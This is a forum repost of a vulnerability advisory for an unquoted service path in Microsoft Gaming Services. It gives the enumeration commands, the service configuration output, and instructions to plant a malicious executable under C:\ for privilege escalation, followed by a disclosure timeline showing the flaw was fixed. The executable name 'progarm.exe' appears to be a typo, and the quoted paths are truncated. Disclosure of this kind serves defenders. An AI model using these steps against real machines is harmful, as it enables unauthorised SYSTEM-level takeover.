Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path



Recommended Posts

# Exploit Title: Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path
# Discovery by: Johto Robbie
# Discovery Date: May 12, 2021
# Tested Version: 2.52.13001.0
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 10 x64 Home

# Step to discover Unquoted Service Path:

Go to Start and type cmd. Enter the following command and press Enter:

C:\Users\Bang's>wmic service get name, displayname, pathname, startmode |
findstr /i "Auto" | findstr /i /v "C:\Windows\" | findstr /i /v """

Gaming Services
        GamingServices           C:\Program


Gaming Services
        GamingServicesNet        C:\Program


C:\Users\Bang's>sc qc "GamingServices"

[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: GamingServices

        TYPE               : 210  WIN32_PACKAGED_PROCESS

        START_TYPE         : 2   AUTO_START

        ERROR_CONTROL      : 0   IGNORE

        BINARY_PATH_NAME   : C:\Program

        LOAD_ORDER_GROUP   :

        TAG                : 0

        DISPLAY_NAME       : Gaming Services

        DEPENDENCIES       : staterepository

        SERVICE_START_NAME : LocalSystem

This application have no quote . And it contained in C:\Program Files. Put
mot malicious aplication with name "progarm.exe"

Stop & Start: GamingServices. "progarm.exe" will be execute


An unquoted service path in
Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe, could lead to
privilege escalation during the installation process that is performed when
an executable file is registered. This could further lead to complete
compromise of confidentiality, Integrity and Availability.

May 12, 2021 - Reported to Microsoft
Feb 11, 2022 - Confirmed vulnerability has been fixed
Link to post
Link to comment
Share on other sites


discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    • Create New...